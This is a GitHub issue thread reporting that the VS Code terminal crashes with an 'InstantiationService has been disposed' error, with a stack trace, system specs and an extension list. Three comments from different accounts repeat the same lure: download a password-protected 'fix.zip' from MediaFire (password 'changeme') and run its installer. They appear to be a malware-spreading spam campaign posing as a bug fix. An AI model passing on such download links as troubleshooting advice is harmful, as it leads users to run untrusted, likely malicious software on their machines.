### ISSUE TITLE
Unable to Launch Terminal - InstantiationService has been disposed

### ISSUE THREAD

**Issue by michael-pagan** [microsoft/vscode#226630]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: 1.92.2
- OS Version: Sonoma 14.6.1

Laptop won't let me report this bug automatically. Manually inputting info below.

Steps to Reproduce:

1. Open VSCode
2. Open Terminal (Manually or Shortcut)
3. Terminal flashes and disappears

Stacktrace:
```
2024-08-26 10:50:41.380 [error] InstantiationService has been disposed: Error: InstantiationService has been disposed
    at g.m (vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:655:386)
    at g.createInstance (vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:655:944)
    at Ue.Wc (vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js:2633:57059)
2024-08-26 10:50:41.404 [trace] [secrets] getting secret for key: secret://vscode.loginAccount
2024-08-26 10:50:41.404 [trace] [secrets] no secret found for key: secret://vscode.loginAccount
```

System Specs:
CPUs | Apple M1 Pro (10 x 2400)
-- | --
GPU Status | 2d_canvas: enabled canvas_oop_rasterization: enabled_on direct_rendering_display_compositor: disabled_off_ok gpu_compositing: enabled multiple_raster_threads: enabled_on opengl: enabled_on rasterization: enabled raw_draw: disabled_off_ok skia_graphite: disabled_off video_decode: enabled video_encode: enabled webgl: enabled webgl2: enabled webgpu: enabled webnn: disabled_off
Load (avg) | 3, 3, 3
Memory (System) | 16.00GB (0.54GB free)
Process Argv | --crash-reporter-id 878040d9-5e52-441b-9311-09421e8d28cb
Screen Reader | no
VM | 0%

Extensions:
Extension | Author (truncated) | Version
-- | -- | --
markdown-preview-github-styles | bie | 2.0.4
vscode-markdownlint | Dav | 0.55.0
gitlens | eam | 15.3.1
pre-commit-helper | ela | 0.5.0
prettier-vscode | esb | 11.0.0
codespaces | Git | 1.17.2
copilot | Git | 1.223.0
copilot-chat | Git | 0.18.2
vscode-pull-request-github | Git | 0.94.0
cloudcode | goo | 2.16.4
todo-tree | Gru | 0.0.226
markdown-converter | man | 5.2.1
rainbow-csv | mec | 3.12.0
prettify-json | moh | 0.0.3
vscode-docker | ms- | 1.29.2
autopep8 | ms- | 2024.0.0
black-formatter | ms- | 2024.2.0
debugpy | ms- | 2024.11.2024081401
isort | ms- | 2023.10.1
pylint | ms- | 2023.10.1
python | ms- | 2024.12.3
vscode-pylance | ms- | 2024.8.1
jupyter | ms- | 2024.7.0
jupyter-keymap | ms- | 1.1.2
jupyter-renderers | ms- | 1.0.19
vscode-jupyter-cell-tags | ms- | 0.1.9
vscode-jupyter-slideshow | ms- | 0.1.6
remote-containers | ms- | 0.380.0
remote-ssh | ms- | 0.113.1
remote-ssh-edit | ms- | 0.86.0
remote-explorer | ms- | 0.4.3
vscode-speech | ms- | 0.10.0
vsliveshare | ms- | 1.0.5936
indent-rainbow | ode | 8.3.1
quicktype | qui | 23.0.170
background | sha | 1.2.13
git-autoconfig | shy | 0.0.2
snowflake-vsc | sno | 1.9.1
code-spell-checker | str | 3.0.1
vscode-pets | ton | 1.27.0
vscode-icons | vsc | 12.8.0
txt-syntax | xsh | 0.2.4
markdown-pdf | yza | 1.5.0
markdown-all-in-one | yzh | 3.6.2
json | Zai | 2.0.2

A/B Experiment Info
vsliv368cf:30146710
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805:30301674
binariesv615:30325510
vsaa593cf:30376535
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
welcomedialogc:30910334
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
h48ei257:31000450
pythontbext0:30879054
accentitlementst:30995554
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
945dj816:31013170
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupytercf:31046870
2f103344:31071589
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flighttreat:31119336
wkspc-onlycs-c:31111717
wkspc-ranged-c:31123312
fje88620:31121564

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by michael-pagan** [comment]
Disregard

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
